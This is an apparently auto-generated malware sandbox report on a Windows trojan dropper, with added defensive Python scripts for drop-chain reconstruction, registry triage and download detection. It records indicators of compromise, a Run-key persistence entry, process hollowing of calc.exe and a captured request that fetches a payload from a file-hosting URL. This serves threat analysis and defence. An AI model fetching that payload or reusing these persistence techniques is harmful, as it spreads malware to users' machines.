Trojan-Dropper.Win32.Polymorph1_2a27da8827

by malwarelabrobot on April 25th, 2017 in Malware Descriptions.

Trojan.GenericKD.4670195 (BitDefender), Worm:Win32/Rebhip.Y (Microsoft), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), DDoS.MP.16 (DrWeb), Trojan.GenericKD.4670195 (B) (Emsisoft), Artemis!2A27DA88274B (McAfee), Trojan.Win32.Llac (Ikarus), Trojan.GenericKD.4670195 (FSecure), Atros5.AADC (AVG), Win32:Malware-gen (Avast), TROJ_GEN.R047C0RDC17 (TrendMicro), Trojan.Win32.Ceatrg.FD, mzpefinder_pcap_file.YR, TrojanDropperPolymorph1.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Worm, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 2a27da88274b61a22697fa631e5c40a1
SHA1: 6d7593a080ccc1be73a0e26f849d83367c673246
SHA256: 20c4ad8b0315f621b4e4014878d8ec08cad23bfe0c4c7c38f842f5b81ff5bc86
SSDeep: 49152:EbuprsA/ARYvVUjl6VSuQIa2l7AAP8Scyyme3KU26hBnBnUS/VmZKzgQQun7cvY:Ebu5f4z6VpzRpRe7BM
Size: 5042085 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-03-24 16:11:42
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan-Dropper: a Trojan whose purpose is the stealthy installation of other malware on the victim's system.

Payload

No specific payload was triggered during the sandbox run. The strings recovered from Adobe.exe and from the region injected into calc.exe (a list of some forty browser User-Agent values, the tokens MPHTTP and MPUDP, the partial request lines "POST / HTTP/1." and "HEAD / HTTP/1.", a Content-Type of application/x-www-form-urlencoded and the loopback address 127.0.0.1), together with DrWeb's verdict DDoS.MP.16, point to an HTTP/UDP flood bot whose attack routines were not exercised in this run.

Process activity

The Trojan-Dropper creates the following process(es):

%original file name%.exe:3308
Fuck.exe:2740
Adobe.exe:1464
Adobe.exe:4032
Adobe.exe:2220
Minecraft PremiumV2.4.exe:308
RoamingJava.exe:2944

The Trojan-Dropper injects its code into the following process(es):

calc.exe:1072

The region dumped from that process (calc.exe_1072_rwx_00400000_00011000 in the strings section) is 0x11000 bytes at 0x00400000, writable and executable, and its strings are those of Adobe.exe rather than of Windows Calculator. That is the signature of process hollowing: the Calculator image is replaced in memory by the Adobe.exe payload, and it is this hollowed calc.exe:1072 that goes on to touch the WinINet registry keys listed under Registry activity.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3308 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Minecraft PremiumV2.4.exe (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\dnserrordiagoff_webOC[1] (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\RoamingJava.exe (148 bytes)

Two details are worth noting. The third file really is written directly under AppData as RoamingJava.exe (there is no backslash between Roaming and Java, and the process list shows it executed under that name). dnserrordiagoff_webOC[1] is Internet Explorer's cached DNS-error page, which WinINet stores when a fetch fails to resolve; that matches the URLs table below, where store7.data.hu has no resolved address and only the request to ddl7.data.hu completed.

The process Fuck.exe:2740 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Adobe.exe (72 bytes)

The process Adobe.exe:1464 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\WinNT.tmp (36 bytes)

The process Minecraft PremiumV2.4.exe:308 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MINECRAFT PREMIUMV2.EXE (50 bytes)

The process RoamingJava.exe:2944 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Fuck.exe (72 bytes)

Registry activity

The process calc.exe:1072 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan-Dropper deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process %original file name%.exe:3308 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\2a27da88274b61a22697fa631e5c40a1_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\2a27da88274b61a22697fa631e5c40a1_RASMANCS]
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\2a27da88274b61a22697fa631e5c40a1_RASAPI32]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\2a27da88274b61a22697fa631e5c40a1_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\2a27da88274b61a22697fa631e5c40a1_RASMANCS]
"FileTracingMask" = "4294901760"

"ConsoleTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Dropper deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFeedsInitialSelection"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process Fuck.exe:2740 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan-Dropper deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The processes Adobe.exe:1464, Adobe.exe:4032 and Adobe.exe:2220 each make the same change in the system registry.
To run itself each time Windows boots, the Trojan-Dropper registers its dropped copy under the machine-wide autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Adobe.exe"

Writing to HKLM\...\Run needs administrative rights, which the sandbox account evidently had; on a standard-user account this write fails, and no HKCU autorun entry was recorded in this run. Each of the three Adobe.exe instances wrote the value when it started, so remove the value only after all of them have been terminated. The key path is hard-coded in Adobe.exe (SOFTWARE\Microsoft\Windows\CurrentVersion\Run appears in its strings below); the value name "Adobe" combined with an executable in the user profile rather than under Program Files is what distinguishes it from a genuine Adobe updater entry.

The process Minecraft PremiumV2.4.exe:308 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan-Dropper deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process RoamingJava.exe:2944 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan-Dropper deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFeedsInitialSelection"

Dropped PE files

MD5                               File path
8577b41d8a86300af1f3387bb06241a6  c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Fuck.exe
ced0bccc20475c129d01ababccb33403  c:\Users\"%CurrentUserName%"\AppData\Local\Temp\MINECRAFT PREMIUMV2.EXE
c35390731bd726f8c8d2f1ce45808345  c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Minecraft PremiumV2.4.exe
915c8176605428cd55a6752f8e0b16b5  c:\Users\"%CurrentUserName%"\AppData\RoamingJava.exe
8577b41d8a86300af1f3387bb06241a6  c:\Users\"%CurrentUserName%"\AppData\Roaming\Adobe.exe
8577b41d8a86300af1f3387bb06241a6  c:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\WinNT.tmp

Six files, four distinct binaries: Fuck.exe, Adobe.exe and WinNT.tmp share MD5 8577b41d8a86300af1f3387bb06241a6, so the chain RoamingJava.exe -> Fuck.exe -> Adobe.exe -> WinNT.tmp is one payload copied three times, with WinNT.tmp a spare copy that was not executed in this run (Adobe.exe's strings name both paths). Minecraft PremiumV2.4.exe and MINECRAFT PREMIUMV2.EXE are different files despite the similar names.
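The table above buries the most useful fact in the report, that three of the six paths carry one binary. The script below is an added example written for this page (it is not output of, or code from, the Lavasoft analysis system): it rebuilds the drop chain from the File activity and Dropped PE files sections, both transcribed inline as constructed input, and collapses copies by hash. The rule it uses to link a written file to a process, same image name as an entry in the process list, is an assumption that holds for this report but not in general.

```python
from collections import defaultdict

# Transcribed from this report (constructed input, not sandbox output).
ROOT = "%original file name%.exe:3308"
PROCESSES = [ROOT, "Fuck.exe:2740", "Adobe.exe:1464", "Adobe.exe:4032", "Adobe.exe:2220",
             "Minecraft PremiumV2.4.exe:308", "RoamingJava.exe:2944"]
U = r'C:\Users\"%CurrentUserName%"\AppData'
WRITES = [  # (writer process, path written), from "File activity"
    (ROOT, U + r"\Local\Temp\Minecraft PremiumV2.4.exe"),
    (ROOT, U + r"\RoamingJava.exe"),
    ("RoamingJava.exe:2944", U + r"\Local\Temp\Fuck.exe"),
    ("Fuck.exe:2740", U + r"\Roaming\Adobe.exe"),
    ("Adobe.exe:1464", U + r"\Roaming\Microsoft\WinNT.tmp"),
    ("Minecraft PremiumV2.4.exe:308", U + r"\Local\Temp\MINECRAFT PREMIUMV2.EXE"),
]
MD5 = {  # from "Dropped PE files", keyed by file name
    "Fuck.exe": "8577b41d8a86300af1f3387bb06241a6",
    "MINECRAFT PREMIUMV2.EXE": "ced0bccc20475c129d01ababccb33403",
    "Minecraft PremiumV2.4.exe": "c35390731bd726f8c8d2f1ce45808345",
    "RoamingJava.exe": "915c8176605428cd55a6752f8e0b16b5",
    "Adobe.exe": "8577b41d8a86300af1f3387bb06241a6",
    "WinNT.tmp": "8577b41d8a86300af1f3387bb06241a6",
}


def image(proc):          # "Adobe.exe:1464" -> "Adobe.exe"
    return proc.rsplit(":", 1)[0]


def basename(path):       # ntpath-style split, independent of the host OS
    return path.rsplit("\\", 1)[-1]


def pids(name):           # PIDs under which a dropped file was seen running
    return [p.rsplit(":", 1)[1] for p in PROCESSES if image(p).lower() == name.lower()]


def unique_binaries(md5=MD5):
    """md5 -> [file names], so copies of one payload collapse into a single entry."""
    groups = defaultdict(list)
    for name, h in md5.items():
        groups[h].append(name)
    return dict(groups)


def drop_tree(root=ROOT, writes=WRITES, md5=MD5):
    """Render the drop chain as indented lines, following each written file to the
    process that later ran under the same image name (assumption, see lead-in)."""
    by_writer = defaultdict(list)
    for proc, path in writes:
        by_writer[image(proc).lower()].append(path)
    twins = unique_binaries(md5)
    lines, seen = [root], set()

    def walk(name, depth):
        if name.lower() in seen:            # guard against a self-copying loop
            return
        seen.add(name.lower())
        for path in by_writer.get(name.lower(), []):
            child = basename(path)
            h = md5.get(child, "?")
            same = [n for n in twins.get(h, []) if n != child]
            note = f" (same bytes as {', '.join(same)})" if same else ""
            ran = pids(child)
            lines.append("  " * depth + f"+- {child}  md5={h}{note}"
                         + (f"  ran as PID {'/'.join(ran)}" if ran else "  no process recorded"))
            walk(child, depth + 1)

    walk(image(root), 1)
    return lines


if __name__ == "__main__":
    print("\n".join(drop_tree()))
    print(f"{len(MD5)} dropped files, {len(unique_binaries())} distinct binaries")
```

Run as a script it prints the chain with the original sample at the root, the two first-stage drops beneath it, and the Fuck.exe -> Adobe.exe -> WinNT.tmp branch annotated as copies of one another.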

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.
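Returning to the Registry activity section: most of what is listed there is not malicious behaviour but the side effect of WinINet and the RAS API initialising inside every process that touched the network, and only the Run value is persistence. The script below is an added example, not part of the report, that separates the two classes. The event list is a subset transcribed from the Registry activity section (constructed input); the key patterns and category names are my own.

```python
import re

# (process, operation, key, value name, data); deletions carry data=None.
# Transcribed from the "Registry activity" section of this report.
EVENTS = [
    ("calc.exe:1072", "set",
     r"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap", "AutoDetect", "1"),
    ("calc.exe:1072", "delete",
     r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap", "ProxyBypass", None),
    ("%original file name%.exe:3308", "set",
     r"HKLM\SOFTWARE\Microsoft\Tracing\2a27da88274b61a22697fa631e5c40a1_RASMANCS", "EnableFileTracing", "0"),
    ("%original file name%.exe:3308", "set",
     r"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings", "ProxyEnable", "0"),
    ("%original file name%.exe:3308", "delete",
     r"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings", "AutoConfigURL", None),
    ("%original file name%.exe:3308", "delete",
     r"HKCU\Software\Microsoft\Internet Explorer\LowRegistry", "AddToFavoritesInitialSelection", None),
    ("Adobe.exe:1464", "set",
     r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Adobe",
     r'C:\Users\"%CurrentUserName%"\AppData\Roaming\Adobe.exe'),
]

AUTORUN_KEY = re.compile(r"\\CurrentVersion\\(Run|RunOnce|RunOnceEx|RunServices)$", re.I)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Public)\\", re.I)
# Created by the RAS tracing infrastructure the first time a process calls a RAS API,
# which WinINet does internally while checking for dial-up connections.
RAS_TRACING = re.compile(r"\\Microsoft\\Tracing\\(?P<exe>[^\\]+)_(RASAPI32|RASMANCS)$", re.I)
WININET_INIT = re.compile(r"\\Internet Settings(\\ZoneMap|\\Connections)?$|\\Internet Explorer\\LowRegistry$", re.I)
PROXY_VALUES = {"proxyenable", "proxyserver", "proxyoverride", "autoconfigurl"}


def classify(event):
    """Return (severity, category, explanation) for one registry event."""
    proc, op, key, name, data = event
    if op == "set" and AUTORUN_KEY.search(key):
        hive = "machine-wide" if key.upper().startswith("HKLM") else "per-user"
        in_profile = bool(data and USER_WRITABLE.search(data))
        sev = "HIGH" if in_profile else "MEDIUM"
        return sev, "persistence", (f"{proc} registered {data!r} as {hive} autorun value {name!r}"
                                    + (" pointing into a user-writable directory" if in_profile else ""))
    m = RAS_TRACING.search(key)
    if m:
        return "INFO", "ras-tracing", (f"{proc}: RAS tracing key created on first RAS/WinINet use; "
                                       f"the key name records the image name {m.group('exe')!r}")
    if WININET_INIT.search(key):
        if name.lower() in PROXY_VALUES:
            return "LOW", "proxy-config", (f"{proc} {op} {name!r}: WinINet resets proxy defaults on a fresh "
                                           "profile, but on a managed host compare with the baseline")
        return "INFO", "wininet-init", f"{proc} {op} {name!r}: ZoneMap/LowRegistry defaults written when WinINet initialises"
    return "LOW", "unclassified", f"{proc} {op} {key}\\{name}"


def triage(events):
    """Group findings by category: {category: [(severity, explanation), ...]}."""
    out = {}
    for ev in events:
        sev, cat, why = classify(ev)
        out.setdefault(cat, []).append((sev, why))
    return out


def network_users(events):
    """Processes whose WinINet/RAS side effects show they made network calls."""
    return sorted({ev[0] for ev in events
                   if classify(ev)[1] in ("wininet-init", "ras-tracing", "proxy-config")})


if __name__ == "__main__":
    for cat, items in triage(EVENTS).items():
        for sev, why in items:
            print(f"[{sev:6}] {cat:13} {why}")
    print("processes that touched the network stack:", network_users(EVENTS))
```

Two things fall out of the run. The Tracing key name is the MD5 of the sample, because the sandbox executed it under that file name, so the same key on a victim machine will carry whatever name the dropper arrived with. And the hollowed calc.exe:1072 shows up among the network users purely from its WinINet side effects, which is a cheap way to spot a process that should never talk to the network doing so.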

Propagation

VersionInfo

Company Name: ejST
Product Name: ejST
Product Version: 1.0.0.0
Legal Copyright: Copyright (c) 2017
Legal Trademarks:
Original Filename: ejST.exe
Internal Name: ejST.exe
File Version: 1.0.0.0
File Description: ejST
Comments: ejST
Language: English (United States)

PE Sections

Name    Virtual Address  Virtual Size  Raw Size  Entropy   Section MD5
.text   8192             2469492       2469888   5.46516   90b4cd4231d6f379fc1d112f0cf2fb1e
.sdata  2482176          488           512       4.58383   b9cbc932f192dd03d6460c616daf0379
.rsrc   2490368          141684        141824    3.18583   d799f397497a479c91f09cc6ea5179f9
.reloc  2637824          12            512       0.070639  07625db8eb339abbcf82e207ec171188

The raw sizes sum to 2612736 bytes; assuming the usual 512-byte file alignment for the headers, the last section ends near offset 2613248, while the file is 5042085 bytes long. The remaining 2.4 MB is overlay appended after .reloc, consistent with a dropper that carries its embedded executables (the Dropped PE files above) outside the section table. The .sdata section and the PEiD NETexecutable hit mark the sample as a .NET assembly; the downloaded Stub.exe, whose response body below references mscorlib 2.0.0.0 and shows the same four section names, is one too.

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
a45b300dd2aef462fa4ef659ddda0a3f

URLs

URL                                                 IP
hxxp://store7.data.hu/get/394365/10410348/Stub.exe  (not resolved)
hxxp://ddl7.data.hu/get/394365/10410348/Stub.exe    217.65.97.33

Both URLs name the same upload on the data.hu file-hosting service. store7.data.hu did not resolve during the run (the cached DNS-error page under Temporary Internet Files is the trace of that failure) and the file was fetched from ddl7.data.hu instead. Because data.hu is shared hosting, the hostname and IP address are weak indicators on their own; the path /get/394365/10410348/Stub.exe, the ETag "58d5285f-2a8840" and the Content-Length 2787392 in the response below identify this particular file.


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

GET /get/394365/10410348/Stub.exe HTTP/1.1
Host: ddl7.data.hu
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Mon, 24 Apr 2017 08:12:23 GMT
Content-Type: application/octet-stream
Content-Length: 2787392
Last-Modified: Fri, 24 Mar 2017 14:08:31 GMT
Connection: keep-alive
Content-Disposition: attachment; filename=Stub.exe
ETag: "58d5285f-2a8840"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L...P..X
..................'.........~.'.. ....'...@.. .......................@
*...........@.................................(.'.S.....'.x)..........
......... *.......'.............................................. ....
........... ..H............text.....'.. ....'................. ..`.sda
ta..8.....'.......'.............@....rsrc...x)....'..*....'...........
..@..@.reloc....... *.......).............@..B........................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................`.'.....H.......@k...I....
......P ..............................................................
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=n
eutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResour
ceSet............PADPADP....3...............lSystem.Resources.Resource
Reader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77
a5c561934e089#System.Resources.RuntimeResourceSet............fSystem.D
rawing.Icon, System.Drawing, Version=2.0.0.0, Culture=neutral, Pub

<<< skipped >>>
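The two ET alerts above fire on exactly this exchange: a bare request with no User-Agent or Accept header for a short .exe path, answered with a PE image. The following is an added example (not the ET signatures and not code from the report) that re-implements that intent over the captured request and response headers. Because the page shows only the first bytes of the 2.7 MB body, the body here is a constructed minimal PE32 image with the same four section names as the real Stub.exe, and Content-Length is set to that stub's length rather than to 2787392.

```python
import re
import struct

# Request and response headers as captured above; the body is constructed.
RAW_REQUEST = (b"GET /get/394365/10410348/Stub.exe HTTP/1.1\r\n"
               b"Host: ddl7.data.hu\r\n"
               b"Connection: Keep-Alive\r\n\r\n")


def build_pe_stub(section_names=(b".text", b".sdata", b".rsrc", b".reloc")):
    """Smallest PE32 image parse_pe() accepts: DOS header, DOS stub text, COFF header
    for an i386 executable, a zeroed PE32 optional header and a bare section table."""
    e_lfanew = 0x80
    dos_header = b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)           # 64 bytes
    dos_stub = (b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"
                b"This program cannot be run in DOS mode.\r\n$").ljust(e_lfanew - 64, b"\0")
    optional = struct.pack("<H", 0x10B) + b"\0" * 222                      # 0xE0 bytes, magic = PE32
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, len(optional), 0x0102)
    sections = b"".join(n.ljust(8, b"\0") + b"\0" * 32 for n in section_names)
    return dos_header + dos_stub + b"PE\0\0" + coff + optional + sections


BODY = build_pe_stub()
RAW_RESPONSE = (b"HTTP/1.1 200 OK\r\n"
                b"Server: nginx\r\n"
                b"Date: Mon, 24 Apr 2017 08:12:23 GMT\r\n"
                b"Content-Type: application/octet-stream\r\n"
                b"Content-Length: " + str(len(BODY)).encode() + b"\r\n"
                b"Last-Modified: Fri, 24 Mar 2017 14:08:31 GMT\r\n"
                b"Connection: keep-alive\r\n"
                b"Content-Disposition: attachment; filename=Stub.exe\r\n"
                b'ETag: "58d5285f-2a8840"\r\n'
                b"Accept-Ranges: bytes\r\n\r\n") + BODY


def split_message(raw):
    """(start line, {lower-cased header: value}, body) for one HTTP message."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        k, _, v = line.partition(":")
        headers[k.strip().lower()] = v.strip()
    return lines[0], headers, body


def parse_pe(body):
    """Basic facts about a PE image, or None if the bytes are not one."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", body, 0x3C)[0]
    if e_lfanew + 24 > len(body) or body[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, nsec, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", body, e_lfanew + 4)
    magic = struct.unpack_from("<H", body, e_lfanew + 24)[0] if opt_size >= 2 else 0
    table = e_lfanew + 24 + opt_size
    names = [body[o:o + 8].rstrip(b"\0").decode("ascii", "replace")
             for o in range(table, table + 40 * nsec, 40) if o + 8 <= len(body)]
    return {"machine": machine, "is_dll": bool(chars & 0x2000),
            "format": {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, "unknown"), "sections": names}


def assess(raw_request, raw_response):
    """Mimic the intent of the two ET alerts: a terse request for an .exe and a
    response whose body is a Windows executable. Not the ET rule logic itself."""
    req_line, req_hdr, _ = split_message(raw_request)
    status, rsp_hdr, body = split_message(raw_response)
    findings = []
    path = req_line.split(" ")[1]
    terse = "user-agent" not in req_hdr and "accept" not in req_hdr   # scripted fetch, not a browser
    if terse and re.fullmatch(r"(/[A-Za-z0-9._-]+)*/[A-Za-z0-9_]+\.exe", path):
        findings.append("terse-exe-request")
    pe = parse_pe(body)
    if pe:
        findings.append("exe-download")
    elif rsp_hdr.get("content-disposition", "").lower().endswith(".exe"):
        findings.append("exe-name-without-pe-body")   # renamed/encrypted payload or truncated capture
    declared = rsp_hdr.get("content-length")
    if declared is not None and int(declared) != len(body):
        findings.append("content-length-mismatch")
    return {"status": status, "host": req_hdr.get("host"), "path": path, "pe": pe, "findings": findings}


if __name__ == "__main__":
    print(assess(RAW_REQUEST, RAW_RESPONSE))
```

On a real capture, feed the reassembled TCP stream to assess(); the content-length-mismatch finding is what tells a truncated pcap apart from a complete download, and parse_pe() still reports the machine type and whatever section names survived.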

The Trojan-Dropper connects to the servers listed in the URLs section above: ddl7.data.hu (217.65.97.33) and store7.data.hu, which did not resolve during the run.

Strings from dumps

Each block below is labelled with the image name and PID it was dumped from; a label of the form <image>_<PID>_rwx_<base>_<size> denotes a writable-and-executable memory region dumped from that process rather than its on-disk image.

MINECRAFT PREMIUMV2.EXE_1084:

.text
`.data
.rsrc
MSVBVM60.DLL
frmLogin
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
advapi32.dll
RegOpenKeyA
RegCreateKeyA
RegDeleteKeyA
RegEnumKeyA
RegEnumKeyExA
RegFlushKey
RegGetKeySecurity
WINMM.DLL
shell32.dll
ShellExecuteA
mciExecute
MapVirtualKeyA
keybd_event
icmp.dll
WSOCK32.DLL
imagehlp.dll
ole32.dll
GetAsyncKeyState
version.dll
kernel32.dll
wininet.dll
SHFileOperationA
shdocvw.dll
RegLoadKeyA
RegUnLoadKeyA
RegNotifyChangeKeyValue
RegQueryInfoKeyA
RegReplaceKeyA
RegRestoreKeyA
RegSaveKeyA
RegSetKeySecurity
urlmon
URLDownloadToFileA
WinExec
WinExecErrorA
VBA6.DLL
GetKeyValue
cmdOK
cmdSysInfo
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
txt_pass
cmdCancel
Login
%%-/788::=@=:887/-%%
#%--//788:::87//--%#
#%(-///7888///-(%#
#%(--///7//--(%#
!#%(--////--(%#!
"%-///888//-%"
5::=@@@@=::/
,:::=@@=:::,
-588:85-
Password
&Password:
2004:06:28 11:33:04
n.rzg
urlTEXT
MsgeTEXT
HhXXp://ns.adobe.com/xap/1.0/
<x:xapmeta xmlns:x='adobe:ns:meta/' x:xaptk='XMP toolkit 2.8.2-33, framework 1.5'>
<rdf:RDF xmlns:rdf='hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#' xmlns:iX='hXXp://ns.adobe.com/iX/1.0/'>
<rdf:Description about='uuid:319bd9b1-c931-11d8-a978-e88c36bed731'
xmlns:xapMM='hXXp://ns.adobe.com/xap/1.0/mm/'>
<xapMM:DocumentID>adobe:docid:photoshop:319bd9af-c931-11d8-a978-e88c36bed731</xapMM:DocumentID>
M0%Xy
-KK9}N
.Fr:i
-.jj)
*:!?:7>7
=%UUmn
.MDW7h
vu.ww
2004:07:02 00:38:05
<rdf:Description about='uuid:94df19c4-cbfa-11d8-aebf-d36903ae7d96'
<xapMM:DocumentID>adobe:docid:photoshop:94df19c2-cbfa-11d8-aebf-d36903ae7d96</xapMM:DocumentID>
M.WoP
%F?#%,
.lywn
p.ec"]Zja
G:\K{
n.monu
7.Kan
2004:07:02 23:26:39
&3.oUfK
<rdf:Description about='uuid:15512a58-ccb4-11d8-987f-83d5623b4ac8'
<xapMM:DocumentID>adobe:docid:photoshop:15512a56-ccb4-11d8-987f-83d5623b4ac8</xapMM:DocumentID>
E)i%1x
.Pu'a
XF%FrZ
u.cX-
)P.is
v5.ju
.LwYJ&
abhishekspjc@gmail.com
KeyRoot
KeyName
SubKeyRef
KeyVal
*.exe
$%&()[]{}
thepassword
83636323
34533453
33435333733313334443
83339333
5363637313633353
6463636354639343
0323334364230323
5463536303736443
0353444353434353
435353536443
44634373
332333233323
43330373836303735423
3443235353535423
34634463437383635423
03232453032303230323
44530323
0373836303735423
53332333
23432333
4373837343735423
4373136323635423
9363546393635423
6363546393635423
4463437383635423
33330373836303735423
0373337313635423
337314635423
33435333
93734463446353734363
4433344323535353
33337333
33436333
335364434343
63331333335364434343
03330333
0333033303330333
63331333544393437353
6333133344430353
2333333344430353
23333333544393437353
23333333335364434343
63331333233333536443
23333333233333536443
43535443
23333333735343535443
23535343834343536443
033353438343
